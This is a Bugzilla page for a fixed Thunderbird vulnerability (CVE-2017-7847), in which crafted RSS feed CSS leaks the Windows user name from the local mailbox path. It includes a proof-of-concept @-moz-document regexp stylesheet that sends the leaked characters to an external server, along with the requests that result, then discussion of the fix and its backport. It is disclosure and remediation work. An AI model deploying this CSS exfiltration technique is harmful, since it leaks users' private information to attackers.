Closed Bug 1411708 (CVE-2017-7847) Opened 7 years ago Closed 7 years ago

TBE-01-012: RSS Local Path Leak via @-moz-document

Categories

(MailNews Core :: Feed Reader, defect)

Product:
MailNews Core
Component:
Feed Reader
Type:
defect
Priority:
Not set
Severity:
major

Tracking

(thunderbird_esr52+)

Status:
RESOLVED FIXED
Milestone:
Thunderbird 59.0
Tracking Flags:
Tracking Status
thunderbird_esr52 + ---

People

(Reporter: BenB, Unassigned)

References

Details

(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [fixed by bug 1035091])

Attachments

(2 files)

uplift needed.txt
13 bytes, text/plain
Details
port.patch
3.58 KB, patch
Details | Diff | Splinter Review 
It was found that the local path string is leaked via crafted CSS in the Thunderbird feed feature. Gecko supports the @-moz-document CSS at-rule 2 . This at-rule allows to apply CSS depending on the string included in the URL. On Windows, if the <link> element, which is used for the article URL, is not specified, the feed contents are loaded in mailbox:///C:/Users/[USER_NAME]/... including computer’s user-name. The following steps show that this [USER_NAME] string can be leaked via the @-moz-document rule.
Steps to Reproduce:
• Subscribe to the https://vulnerabledoma.in/pen/tb_-moz-document_pathleak.xml
feed from one’s account.
• Open the feed’s contents.
• Confirm background requests. Observe the local path, including computer’s user- name, being sent to an external domain.

PoC:
<style>
@-moz-document regexp("mailbox:///C:/Users/A.*$")
{.div1{background:url(https://cure53.de/?char1=A)}}
@-moz-document regexp("mailbox:///C:/Users/B.*$")
{.div1{background:url(https://cure53.de/?char1=B)}}
@-moz-document regexp("mailbox:///C:/Users/C.*$")
{.div1{background:url(https://cure53.de/?char1=C)}}
@-moz-document regexp("mailbox:///C:/Users/D.*$")
{.div1{background:url(https://cure53.de/?char1=D)}}
[...]
</style>
This PoC shows how it is first attempted to get the initial ten characters from user-name string on the local path. Assuming a victim with a user-name "Masato", the following requests will be sent:
GET https://cure53.de/?char1=M HTTP/1.1
GET https://cure53.de/?char1=a HTTP/1.1
GET https://cure53.de/?char1=s HTTP/1.1
GET https://cure53.de/?char1=a HTTP/1.1
GET https://cure53.de/?char1=t HTTP/1.1
GET https://cure53.de/?char1=o HTTP/1.1

It seems that there is a plan to remove the @-moz-document rule 3 , but this has not been implemented so far. Therefore, it is recommended to disable the use of @-moz-document rule from web content. This will help ensure that an attacker cannot abuse the power of regular expressions by combining them with seemingly harmless CSS in seeking to match and exfiltrate valuable data.
For the original report as PDF; see bug 1411701.
Group: mail-core-security
Another approach might be to disable the loading of remote content in "local" feed content the way we do for mail. Of course the default behavior is to load the feed items as web pages which obviously requires remote content, so that's not going to work there.
Keywords: csectype-disclosure, privacy, sec-moderate
If the root problem is Bug 1035091, then it doesn't seem the correct solution is in the feed component or even thunderbird content poolicy.
Depends on: 1035091
Whiteboard: [bug 1035091 would be the correct fix]
Summary: RSS Local Path Leak via @-moz-document → TBE-01-012: RSS Local Path Leak via @-moz-document
Fixed by Bug 1035091.
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → Thunderbird 59.0
We should probably uplift, with slight modification (from bug 1035091):
https://hg.mozilla.org/mozilla-central/rev/37e0bd919af0
https://hg.mozilla.org/mozilla-central/rev/b556432c990b
tracking-thunderbird52: --- → ?
Whiteboard: [bug 1035091 would be the correct fix] → [fixed by bug 1035091]
(In reply to Magnus Melin from comment #5)
> We should probably uplift, with slight modification (from bug 1035091):
"with slight modification"? Which modification?
Flags: needinfo?(mkmelin+mozilla)
Well, to make pref("layout.css.moz-document.content.enabled",  false);

(Or just uplift as is + that land that pref setting in all-thunderbird.js)
Flags: needinfo?(mkmelin+mozilla)
Attached file uplift needed.txt 
tracking esr 52 won't find the bug, but attaching a patch will.
Attachment #8933935 - Flags: approval-comm-esr52+
Group: mail-core-security → core-security-release
Comment on attachment 8933935 [details]
uplift needed.txt

Sadly
https://hg.mozilla.org/mozilla-central/rev/37e0bd919af0
https://hg.mozilla.org/mozilla-central/rev/b556432c990b
can't be uplifted.

When trying to apply the first changeset, I get various merge errors, amongst them:
unable to find 'layout/style/StylePrefs.cpp' for patching
2 out of 2 hunks FAILED -- saving rejects to file layout/style/StylePrefs.cpp.rej
unable to find 'layout/style/StylePrefs.h' for patching
1 out of 1 hunks FAILED -- saving rejects to file layout/style/StylePrefs.h.rej

Those two source files were introduced on bug 1366956 here:
https://hg.mozilla.org/mozilla-central/rev/3ba584a59aa7
Attachment #8933935 - Flags: approval-comm-esr52+
Alias: CVE-2017-7847
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: